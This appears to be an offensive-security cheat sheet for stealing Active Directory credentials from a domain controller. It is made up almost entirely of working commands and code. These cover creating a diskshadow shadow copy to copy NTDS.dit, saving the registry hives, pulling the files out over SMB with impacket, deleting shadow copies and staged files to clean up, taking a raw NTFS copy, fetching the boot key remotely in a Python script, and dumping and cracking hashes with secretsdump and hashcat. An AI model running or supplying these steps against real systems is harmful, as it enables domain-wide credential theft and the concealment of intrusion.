Shadow Disk
Create via Diskshadow
Locate diskshadow.exe (it ships with Windows Server, not with client editions, so on a DC it is normally found under C:\Windows\System32):
cmd /c where /R C:\ diskshadow.exe
Create a shadow copy of C: and expose it as drive W:. The context must be persistent (so the shadow outlives the diskshadow session and can be exposed) and nowriters (no VSS writers are involved, so nothing needs to be quiesced). The script is built line by line with PowerShell and fed to diskshadow with /s:
cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
The resulting add_vol.txt (%DCROOT% is the alias assigned to the new shadow by `add volume`):
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
create
expose %DCROOT% w:
end backup
Exfiltrate over SMB
Copy NTDS.dit out of the exposed shadow (the live copy is locked by lsass, the shadow copy is not) and save the registry hives needed to decrypt it: SYSTEM for the boot key, SAM and SECURITY for local accounts and LSA secrets. Stage everything in C:\Windows\Temp:
cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive
Connect to the C$ administrative share with impacket's smbclient.py and pull the staged files:
$ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive
Clean Up
Unexpose W: and delete the shadow copy. Note that `delete shadows volume c:` removes every shadow copy of C:, not only the one created above; if the host may have legitimate ones (backups, Previous Versions), run `list shadows all` first and delete by ID instead:
cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
The resulting delete_vol.txt:
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
reset
Remove the staged files, the VSS metadata cab and both diskshadow scripts (rm is the PowerShell alias for Remove-Item and exists in most C2 shells; in a plain cmd shell use del):
cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt
Raw NTDS.dit Copy
Obtain a copy of NTDS.dit. The live file is locked by lsass, so a raw-NTFS copy tool such as Invoke-NTFSCopy, which reads the volume directly instead of going through the file handle, is needed:
PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
A raw copy is in a dirty-shutdown state, so repair it with esentutl first, then parse on-site with NtdsAudit (the SYSTEM hive supplies the boot key):
PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o
PS > reg.exe save HKLM\SYSTEM system.hive
PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt
Parse on-site in conjunction with secretsdump.exe. The boot key is needed to decrypt the PEK stored in NTDS.dit; instead of saving the SYSTEM hive to disk, fetch the key remotely with impacket's RemoteOperations:
from binascii import hexlify

from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import RemoteOperations

hostname = 'DC01.megacorp.local'
username = 'snovvcrash'
password = '<PASSWORD>'
nthash = '' if password else '<NTHASH>'   # leave password empty and set nthash for pass-the-hash
domain = hostname.split('.', 1)[1]         # 'megacorp.local'

# NTLM authentication over SMB
smbConn = SMBConnection(remoteName=hostname, remoteHost=hostname)
smbConn.login(user=username, password=password, domain=domain, nthash=nthash)

# Start RemoteRegistry if it is stopped and read the boot key
# (derived from the class names of HKLM\SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data})
remOps = RemoteOperations(smbConnection=smbConn, doKerberos=False)
remOps.enableRegistry()
try:
    bootKey = remOps.getBootKey()
    print(hexlify(bootKey).decode())
finally:
    remOps.finish()   # restores the RemoteRegistry service to its previous state

# Then decrypt the copied database locally with the key:
# .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey <BOOTKEY>
Parse NTDS.dit
Parse with secretsdump.py (-user-status, -pwd-last-set and -history add account status, password age and password history to the output):
$ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
Keep only enabled accounts with a non-empty NT hash, drop machine accounts ($), GUID-style names and Exchange HealthMailbox accounts, and emit user:NThash pairs for hashcat. `aad3b` selects hash lines via the empty-LM prefix, `31d6c` is the NT hash of an empty password; if -history was used, also drop the `_history` entries unless old passwords are wanted:
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 3 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
Parse with aesedb (faster but less informative); antdsparse accepts either the boot key as hex or the path to the SYSTEM hive:
$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress
Parse with ntdissector:
Reversible Encryption
Check if enabled globally:
gpmc.msc > Default Domain Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy > Store passwords using reversible encryption > Enabled ✔
Check if enabled for specific users (128 = 0x80 = ENCRYPTED_TEXT_PWD_ALLOWED in userAccountControl):
PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt
When DCSyncing such users (or parsing NTDS.dit with secretsdump), their cleartext passwords are printed in the ClearText passwords section as user:CLEARTEXT:password.